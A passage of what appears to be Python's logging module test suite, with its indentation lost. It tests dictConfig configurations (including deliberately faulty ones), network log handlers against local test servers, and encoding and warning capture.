with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls(('localhost', server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
